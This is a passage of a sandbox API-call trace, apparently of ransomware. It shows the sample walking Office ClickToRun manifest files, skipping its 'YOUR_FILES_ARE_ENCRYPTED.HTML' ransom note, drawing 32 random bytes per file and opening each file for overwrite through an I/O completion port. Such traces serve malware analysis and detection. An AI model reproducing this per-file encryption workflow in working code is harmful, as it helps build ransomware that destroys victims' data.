out: param_1="36") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4B") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="FC") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="64") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="0C") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="46") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="28") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="3E") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="6F") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="9D") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="41") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9F") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E0") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="A6") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="50") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="34") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="97") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="D5") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="94") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="B8") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="98") returned 2 [0105.253] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1F") returned 2 [0105.254] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" [0105.254] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.254] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0105.256] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843453b4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x843453b4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x644b4868, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cAlternateFileName="C210C4~1.XML")) returned 1 [0105.256] StrStrIW (lpFirst="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.256] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned 123 [0105.256] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0105.256] lstrlenW (lpString=".xml") returned 4 [0105.256] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0105.256] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.257] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=16654) returned 1 [0105.257] GetProcessHeap () returned 0x600000 [0105.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.305] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="05") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="AB") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D0") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="55") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="F3") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="21") returned 2 [0105.305] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="C1") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="F4") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="55") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="A1") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="9F") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="CE") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A6") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="1C") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="49") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F0") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F0") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="3B") returned 2 [0105.305] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="7E") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="97") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="83") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="89") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0E") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="5B") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="8B") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="59") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="84") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="88") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="1E") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="3D") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="BC") returned 2 [0105.306] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="56") returned 2 [0105.307] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" [0105.307] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.307] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.320] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83460030, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x83460030, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x653fa2bf, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml", cAlternateFileName="C206B0~1.XML")) returned 1 [0105.320] StrStrIW (lpFirst="C2RManifest.dcfmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.320] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned 114 [0105.320] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0105.320] lstrlenW (lpString=".xml") returned 4 [0105.320] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0105.320] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.321] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.321] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=9814) returned 1 [0105.321] GetProcessHeap () returned 0x600000 [0105.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.325] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="9C") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="7C") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="59") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="AF") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="70") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="8A") returned 2 [0105.325] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="7C") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="F4") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="E2") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="81") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="1D") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="63") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="67") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="46") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B9") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="15") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1B") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="FA") returned 2 [0105.325] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="B3") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F6") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="2A") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="16") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="39") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E8") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="94") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F6") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="34") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E6") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="43") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="BB") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C8") returned 2 [0105.326] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="29") returned 2 [0105.327] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" [0105.327] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.327] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.336] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83201564, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x83201564, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65d6189f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cAlternateFileName="C21578~1.XML")) returned 1 [0105.336] StrStrIW (lpFirst="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.336] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned 127 [0105.336] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0105.336] lstrlenW (lpString=".xml") returned 4 [0105.336] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0105.336] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.336] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.339] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=237874) returned 1 [0105.339] GetProcessHeap () returned 0x600000 [0105.339] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.347] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="59") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="0B") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="AF") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D8") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="02") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="3F") returned 2 [0105.347] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B2") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="C0") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="8B") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="63") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="88") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="CB") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="45") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="17") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="78") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="CB") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="FB") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1E") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="FA") returned 2 [0105.347] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="7E") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="CF") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="92") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="69") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="28") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="04") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B8") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="7C") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="1E") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="2B") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="D8") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="70") returned 2 [0105.348] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0D") returned 2 [0105.349] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" [0105.349] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.350] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.350] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65565d76, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.excelmui.msi.16.en-us.xml", cAlternateFileName="C2D2CD~1.XML")) returned 1 [0105.350] StrStrIW (lpFirst="C2RManifest.excelmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.350] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned 116 [0105.352] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0105.352] lstrlenW (lpString=".xml") returned 4 [0105.352] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0105.352] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.352] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.355] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=35024) returned 1 [0105.355] GetProcessHeap () returned 0x600000 [0105.355] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.358] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="BC") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="8D") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2D") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="3D") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="21") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="CD") returned 2 [0105.358] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="F4") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="0A") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5B") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="8E") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="9B") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="04") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="47") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="9B") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A3") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="96") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="EE") returned 2 [0105.358] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="5F") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="DC") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="A1") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="DF") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="E0") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="EA") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="74") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="D8") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="D6") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="6F") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E1") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="FC") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="4E") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="D1") returned 2 [0105.359] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="17") returned 2 [0105.360] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" [0105.360] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.360] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.360] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x643e5724, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", 